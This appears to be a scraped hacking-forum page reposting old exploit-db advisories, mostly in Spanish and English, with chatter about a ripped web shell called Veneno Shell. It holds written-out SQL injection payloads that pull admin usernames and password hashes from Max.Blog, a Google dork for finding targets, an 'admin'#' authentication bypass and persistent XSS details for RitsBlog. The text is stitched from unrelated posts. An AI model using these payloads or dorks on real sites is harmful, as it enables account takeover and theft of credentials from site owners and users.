Re: Veneno Shell 2.0 Nice ripped xD. Original Author : Doddy Hackman Source Original : [Hidden Content] Bye xD

Re: Veneno Shell 1.0 Nice ripped xD. Original Author : Doddy Hackman Source Original : [Hidden Content] Bye xD

> ################### Salvatore "drosophila" Fresta ################### Application: Max.Blog Version: Max.Blog <= 1.0.6 Bug: * SQL Injection Exploitation: Remote Dork: intext:"Powered by Max.Blog" Date: 27 Jan 2009 Discovered by: Salvatore "drosophila" Fresta Author: Salvatore "drosophila" Fresta ############################################################################ - BUGS SQL Injection: Requisites: magic quotes = off File affected: submit_post.php This bug allows a registered user to view username and password (md5) of a registered user with the specified id (usually 1 for the admin) [Hidden Content],NULL,NULL,CONCAT(username,char(58),password)+FROM+users+WHERE+id=1%23 ############################################################################ # milw0rm.com [2009-01-28] Fuente : exploit-db

> ******* Salvatore "drosophila" Fresta ******* [+] Application: RitsBlog [+] Version: 0.4.2 [+] Bugs: [A] SQL Injection [b] XSS Persistent [+] Exploitation: Remote [+] Date: 02 Mar 2009 [+] Discovered by: Salvatore "drosophila" Fresta [+] Author: Salvatore "drosophila" Fresta ************************************************* [+] Menu - [1] Bugs - [2] Code - [3] Fix ************************************************* [+] Bugs - [A] SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: ritsBlogAdmin.class.php This blog is entirely vulnerable to SQL Injection. The following is the vulnerable query that can be used to bypass authentication. In jobs.php: if ($_GET[j] == "login"){ if ($blog -> login($_GET[p])){ $_SESSION[loggedin] = "ok"; $_SESSION[userID] = $blog -> userID; echo "Password found. Loging in..."; .... In ritsBlogAdmin.class.php: function login($password){ global $db; $sql = "select * from users where secretWord = '$password'"; ... } - [b] XSS Persistent [-] Requisites: none [-] File affected: ritsBlogAdmin.class.php In jobs.php: if ($_POST[j] == "addComment"){ echo $blog -> addComment($_POST[id], $_POST[name], $_POST[body]); } In ritsBlogAdmin.class.php function addComment($id, $name, $body){ global $db; $sql = "INSERT INTO comments (name, postID, date, text) VALUES('" . addslashes($name) . "','" . $id . "',NOW(),'" . addslashes($body) . "')"; ... } ************************************************* [+] Code - [A] SQL Injection [Hidden Content] - [b] XSS Persistent It is possible using forms in the index.php or to send over POST method the following values: ?j=addComment&id=54&name=myname&body= or ?j=addComment&id=54&name=&body=body ************************************************* [+] Fix No fix. ************************************************* -- Salvatore "drosophila" Fresta CWNP444351 # milw0rm.com [2009-03-02] Fuente : exploit-db

action="[Hidden Content]" method="POST"> value="admin'#" size="15">

> ################### Salvatore "drosophila" Fresta ################### Application: Max.Blog Version: Max.Blog <= 1.0.6 Bug: * SQL Injection Exploitation: Remote Dork: intext:"Powered by Max.Blog" Date: 20 Jan 2009 Discovered by: Salvatore "drosophila" Fresta Author: Salvatore "drosophila" Fresta ############################################################################ - BUGS SQL Injection: File affected: show_post.php This bug allows a guest to view username and password (md5) of a registered user with the specified id (usually 1 for the admin) [Hidden Content],concat('username: ', username),concat('password: ', password),4,5,6,7+FROM+users+WHERE+id=1%23 ############################################################################ # milw0rm.com [2009-01-27] Fuente : exploit-db

Hola soy Doddy , me dedico solo a la programacion y rara vez a la seguridad web.

leerme las reglas ? hice algo malo ? xDD.

Hola soy Doddy , no tengo mucho que decir pero bueno , chau. xDD.

que bien , esa es mi poisonshell.